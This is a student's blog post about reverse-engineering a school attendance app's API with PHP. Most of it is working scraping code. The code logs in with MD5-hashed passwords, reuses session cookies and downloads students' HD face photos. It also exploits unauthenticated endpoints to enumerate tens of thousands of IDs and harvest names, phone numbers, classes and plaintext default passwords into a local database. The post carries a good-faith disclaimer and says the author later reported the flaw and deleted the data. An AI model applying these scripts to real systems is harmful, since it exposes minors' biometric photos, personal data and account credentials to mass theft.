Use PHP to scrape school attendance system data

For convenience and not to disclose information, the attendance system is abbreviated as "Little Bee" below, and the domain name is also bee.com
Disclaimer: All behaviors mentioned in this article are tested in good faith, and the vulnerability will be submitted to the official after the test is completed, please do not use it for illegal purposes!

0. Origin

A month ago, the school sent each class the parent accounts of the attendance system generated in batches, but the parents in our class did not use these accounts. One day, a classmate came to me and told me that she used her parent's account to log in and found that I was bound, and she could also view the photos of my face.

1. Try to capture packets

I used my account to log in to the Little Bee app. By using HttpCanary to capture the App, I got the API interface and request data format for logging in, getting photos, etc.

2, request interface

2.1. Login

code
1
https://bee.com/sctserver/mob/login?loginname=f11111111111&password=31df73b65ffc25317e1eb8966fe541cc;

As you can see, the data structure of the login part is as follows:

json
1
2
3
4
{
    "loginname":"f11111111111",
    "password":"31df..."
}

Attempted MD5 encryption of the plaintext password and found that the result was exactly what was in the data. So it is certain that the password is encrypted using MD5.
Here is the login code I ended up using:

PHP
1
2
$url="https://bee.com/sctserver/mob/login?loginname=f".$username."&password=".md5($password);
file_get_contents($url);

2.2. Get Cookies

I found that php's file_get_contents function does not automatically save cookies and use them, so I need to manually splice cookies.
By programming for search engines, I used the following code to get cookies and store them in an array:

PHP
1
2
3
4
5
6
7
8
9
$cookies = array();
        foreach ($http_response_header as $hdr)
        {
            if (preg_match('/^Set-Cookie:\s*([^;]+)/', $hdr, $matches))
            {
                parse_str($matches[1], $tmp);
                $cookies += $tmp;
            }
        }

The use of regular expressions here is indeed something I didn't expect, lol.
The obtained Cookies structure is as follows:

json
1
2
3
4
{
    "acw_tc":"784e...",
    "JSESSIONID":"E2692..."
}

2.3. Submit Cookies

When using cookies, I used the following code.

PHP
1
2
3
4
5
6
7
8
$opts=array(
        'http'=>array(
            'header'=>"Cookie: acw_tc=".$cookies['acw_tc']."\r\n" .
                      "Cookie: JSESSIONID=".$cookies['JSESSIONID']."\r\n",
            'ignore_errors'=>true
                    )
                );
$data=file_get_contents("https://bee.com/sctserver/mob/attend/child/in-out?studentId=".$uid,false,stream_context_create($opts));

2.4, get photos

After logging in, you can get StudentId in a field. This data is very important and needs to be used when obtaining other data.
Login interface address:

code
1
https://bee.com/sctserver/mob/attend/child/in-out?studentId=1111111

It is observed that the parameter named imgUrl in the returned data is the photo Url. However, the blur obtained using this method is not at the same level of clarity as seen in the app.
E.g:

code
1
https://server.bee.com/wmdp/comup/attenddir/20xx0x/0x/bre/FACE_DETECT_...-..._20xx0x0x0xxxxx.jpg

It is obvious that photos are stored in the format of domain name/fixed directory+date/bre/student code+date+exact time.
I tried removing the /bre/ in the Url and got the HD version of the photo.

2.5, cache

Worrying that Little Bee only stores photos for a month, I made a localized cache.
Read data:

PHP
1
2
3
4
#Get the list of cached Urls
$url_list=json_decode(file_get_contents("./data/url.json"),true);
#Get a list of invalid student IDs
$null_list=json_decode(file_get_contents("./data/null.json"));

Check for caching:

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# get cache
    #Check if there is a cache directory
    if(!file_exists("./cache/image/".$year."/.cache"))
    {
        for($i=1;$i<=12;$i++)
        {
            for($j=1;$j<=date('t',mktime(0,0,0,$i,1,date("Y")));$j++)
            {
                # Fill the month and day with leading zeros
                $f_month=str_pad($i,2,"0",STR_PAD_LEFT);
                $f_day=str_pad($j,2,"0",STR_PAD_LEFT);
                #create folder
                mkdir("./cache/image/".$year."/".$f_month."/".$f_day,0777,true);
            }
        }
        #mark as created
        file_put_contents("./cache/image/".$year."/.cache","yes");
    }
    #Check if the image has been cached
    if(file_exists($cache_path)&&$url_list[$date][$uid]!="")
    {
        if($local) $img_url=str_replace("./cache/image/","https://cdn.me.com/img/bee.com/",$cache_path);
        else $img_url=$url_list[$date][$uid];
        if($display) redirect($img_url);
        else retCode(200,'Get success',$img_url);
    }

The encapsulated return function:

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#wrapper function
    #return JSON
    function retCode($code, $msg, $retdata)
    {
        if($code==404) header('HTTP/1.1 404 NOT FOUND');
        elseif($code==500) header('HTTP/1.1 404 SERVER ERROR');
        elseif($code==403) header('HTTP/1.1 403 FORBIDDEN');
        die(json_encode(array('code'=>$code,'msg'=>$msg,'data'=>$retdata),JSON_UNESCAPED_UNICODE|JSON_UNESCAPED_SLASHES));
    }
    # redirect
    function redirect($url)
    {
        header("Location:".$url);
    }

This will permanently store the photo.

2.6, get account information

According to the detection, most of the interfaces are not authenticated. For example, an account can obtain the attendance clock record of any account, and even complete account information.

I have to complain here, the return data of Little Bee is really rotten to death, and the school details (country, province, city, zip code) and other data will be repeated two or three times in the returned information, which can be very difficult. The simplified data suddenly became 200KB, no wonder the software is so stuck.

The interface for obtaining account information:

code
1
https://bee.com/sctserver/mob/getinfo?id=1111111

In the returned data, there are classes, names, student IDs and even complete passwords. I guess it is the default password. Some users return ****** after changing their passwords.
So you can grab and process data in batches with simple code.

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#Send get student information request
        $data=json_decode(file_get_contents("https://bee.com/sctserver/mob/getinfo?id=".$id,false,stream_context_create($opts)),true);
    #Result list
        $data_list=$data['data']['familys'][0]['students'][0]['classno'];
    #Check if the user exists
    if($data['message']=="User is not logged in")
    {
        return "nologin";
    }
    else if(!$data['result']||empty($data_list['className'])||empty($data_list['grade']))
    {
        return "null";
    }
    else
    {
        return array(
            $data['data']['phoneNumber'],
            $data['data']['familys'][0]['passwordshowStr'],
            $data_list['className'],
            $data_list['grade'],
            $data['data']['name']
        );
    }

Store data:

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
preg_match("/[0-9]{1,2}/",$info[2],$matches);
$class=$matches[2];
if($info[3]=="First grade") $grade=1;
else if($info[3]=="Second grade") $grade=2;
if($info[3]=="Grade 3") $grade=3;
$name=$info[4];
if($currentClass!=$class)
{
    $currentClass=$class;
 
   if(is_array($student_list[$grade][(string)$class])) $currentNum=count($student_list[$grade][(string)$class])+1;
    else $currentNum=1;
}
else $currentNum++;
        $student_list[$grade][$class][$currentNum]=array(
        'uid'=>(int)$i,
        'name'=>(string)$name,
        'num'=>(int)$currentNum
        );
file_put_contents("./data/student.json",json_encode($student_list,JSON_UNESCAPED_UNICODE|JSON_PRETTY_PRINT));

Since I discovered an interface for obtaining user information, I started to build a student information database in my school. In the little bee system, the name, class and StudentId are not in a one-to-one correspondence, so it is difficult to directly obtain the "increment" method. So I fetched the data tens of thousands of times and stored the information in a JSON file.
This took me two hours, because every time PHP was executed for dozens of seconds, the browser would report 504 Time Out, and it was useless to change the configuration.
Finally, I realized that I can freely retrieve the data of the first year of high school, and even the students who have graduated in the second and third year of high school will get it when they are free.
In view of seeing that a junior high school student who had done similar things on the Internet was checked on the water meter, I decided to remind Xiaobee officials after researching for a period of time, and delete all the data I saved. If you can find a few loopholes in it and get a CNVD certificate, it will be even better.
January 10, 2022 Journal.

Use PHP to scrape school attendance system data

https://blog.tsinbei.com/en/archives/5/

Author
Hsukqi Lee
Posted on

2022-01-10

Edited on

2022-07-28

Licensed under

CC BY-NC-ND 4.0

# PHP

Comments

Name
Mail
Site
None yet